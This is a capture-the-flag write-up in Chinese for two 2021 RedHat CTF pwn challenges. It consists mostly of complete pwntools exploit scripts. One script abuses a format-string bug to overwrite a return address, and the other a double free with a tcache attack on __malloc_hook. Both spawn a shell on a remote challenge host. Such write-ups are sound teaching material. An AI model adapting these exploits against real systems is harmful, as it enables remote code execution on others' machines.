2021RedHatCTF

比赛的时候只做出来两题。

parse

http parser 有格式化字符串漏洞，利用它改写 main 函数的返回地址。

#!/usr/bin/python

from pwn import *
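context.log_level = logging.INFO
context.terminal = ['tmux', 'new-window']
context.arch = 'amd64'
LOCAL = 0

# Local binary when debugging, otherwise the CTF instance.
if LOCAL:
    p = process('./chall')
else:
    p = remote('47.105.94.48', 12435)

# Request prefix accepted by the challenge's HTTP parser.  Same bytes as the
# original triple-quoted literal (the bare "\r" line is a carriage return).
# Per the writeup, the text that follows this prefix is passed to a printf-style
# call as its format string.
padding = 'POST /1 1\nContent-Length: -1\n\r\n'

# Deltas measured in one debugging session (0x7ffff7.../0x7fffffff...
# addresses).  They are tied to that libc build and stack layout; re-measure
# before reusing the script elsewhere.
LIBC_LEAK_DELTA = 0x7ffff7a05b97 - 0x7ffff79e4000
STACK_LEAK_DELTA = 0x7fffffffe268 - 0x7fffffffdb7f
ONE_GADGET_OFFSET = 0x4f3c2   # offset inside the leaked libc


def leak_qword(arg_index):
    """Send ``%<arg_index>$lld`` and return the decimal value the server echoes.

    The format is padded to 0x100 characters so the request has the same
    length on every leak, as in the original script.
    """
    fmt = f'%{arg_index}$lld'.ljust(0x100)
    p.sendlineafter('> ', padding + fmt)
    return int(p.recvline().decode())


# Slot 6 + 0xeb holds a libc pointer; base is derived from it.
leak = leak_qword(6 + 0xeb)
p.success('leak: ' + hex(leak))
base = leak - LIBC_LEAK_DELTA
p.success('base: ' + hex(base))

# Slot 6 + 0x03 holds a stack pointer; main's return address is at a fixed
# distance from it.
leak = leak_qword(6 + 0x03)
p.success('leak: ' + hex(leak))
ret_addr = leak + STACK_LEAK_DELTA
p.success('ret_addr: ' + hex(ret_addr))

onegadget = base + ONE_GADGET_OFFSET
p.success('onegadget: ' + hex(onegadget))

# Overwrite the six low bytes of main's return address one byte at a time.
# Each request is: prefix + ' ' + 0x20-char format + 8-byte target pointer.
# The fixed 0x20 padding keeps the pointer at the stack slot that
# '%<WRITE_INDEX>$hhn' consumes; '%1$<n>c' emits n characters first so the
# stored byte equals the running output count.  The "- 1" is an empirical
# adjustment inherited from the original script (presumably one character is
# already counted before this specifier -- not determinable from here).
WRITE_INDEX = 6 + 0x54
request = padding.encode() + b' '
for byte_no in range(6):
    value = (onegadget >> (8 * byte_no)) & 0xff
    payload = f'%1${value - 1}c%{WRITE_INDEX}$hhn'.ljust(0x20).encode()
    payload += p64(ret_addr + byte_no)
    p.sendlineafter('> ', request + payload)

# Let the parser finish, then answer the final prompt so main returns.
p.sendline('')
p.sendlineafter(':', '/bin/bash')
# attach(p,'b *$rebase(0x137D)\nc')

p.interactive()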

manager

二叉搜索树在删除只有一个孩子的节点时发生 double free，随后进行 tcache attack。


#!/usr/bin/python

from pwn import *
context.log_level = logging.DEBUG
context.terminal = ['tmux', 'new-window']
context.arch = 'amd64'
LOCAL = 0

# Local binary when debugging, otherwise the CTF instance.
p = process('./chall') if LOCAL else remote('47.105.94.48', 12243)

def add(key):
    """Menu option 1: insert a node with key *key*, length 10, content str(key).

    Answers the four '> ' prompts in order: option, key, length, content
    (the field meaning follows the comments used later in this script).
    """
    answers = ('1', str(key), '10', str(key))
    for answer in answers:
        p.sendlineafter('> ', answer)

def show():
    """Menu option 3: print the tree; callers read the output themselves."""
    prompt = '> '
    p.sendlineafter(prompt, '3')


def delete(key):
    """Menu option 2: remove the node with key *key*."""
    for answer in ('2', str(key)):
        p.sendlineafter('> ', answer)

def _add_raw(key, length, content):
    """Menu option 1 with every field given explicitly (add() fixes length to 10).

    *key*, *length* and *content* are sent verbatim, so pass str or bytes
    exactly as the prompt expects.
    """
    for answer in ('1', key, length, content):
        p.sendlineafter('> ', answer)


BIG_LEN = str(0x500)

# A large node with an empty body, freed and then re-allocated: show() then
# prints whatever the allocator left in its contents.  Per the writeup the
# delete(0)/delete(1) pair is where the double free happens.
_add_raw('0', BIG_LEN, '')
add(1)
delete(0)
delete(1)
_add_raw('0', BIG_LEN, '')
show()
p.recvuntil('content:')
# Six bytes of stale content read back as a libc pointer.
leak = u64(p.recv(6).ljust(8, b'\x00'))
p.success('leak: ' + hex(leak))

# Deltas measured in a debugging session with this libc build; they do not
# transfer to another build.
base = leak - (0x7ffff7dcfc0a - 0x7ffff79e4000)
p.success('base: ' + hex(base))
malloc_hook = base + (0x7ffff7dcfc30 - 0x7ffff79e4000)
free_hook = base + (0x7ffff7dd18e8 - 0x7ffff79e4000)  # computed, unused below
one_gadget = base + 0x10a45c  # 0x4f365 0x4f3c2 0x10a45c
delete(0)
show()

# Rebuild the tree in this insertion order, then delete key 1 (the one-child
# case from the writeup) and dump it again.
for key in (4, 1, 3, 2, 0):
    add(key)
delete(1)
show()

# Two 8-byte nodes: the first body is a pointer 8 bytes below __malloc_hook,
# presumably consumed by the allocator as a freelist link (tcache attack per
# the writeup); the second is a placeholder value.
_add_raw('12', '8', p64(malloc_hook - 8))
_add_raw('13', '8', p64(0xdeadbeef))

realloc = base + (0x7ffff7a7cca0 - 0x7ffff79e4000)

# 16-byte body laid out as [one_gadget][realloc + 10]; with the hook
# layout assumed above that places them at __realloc_hook and __malloc_hook.
_add_raw('14', '16', p64(one_gadget) + p64(realloc + 10))

# attach(p)
# One more allocation triggers the hook.
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '133')  # key
p.interactive()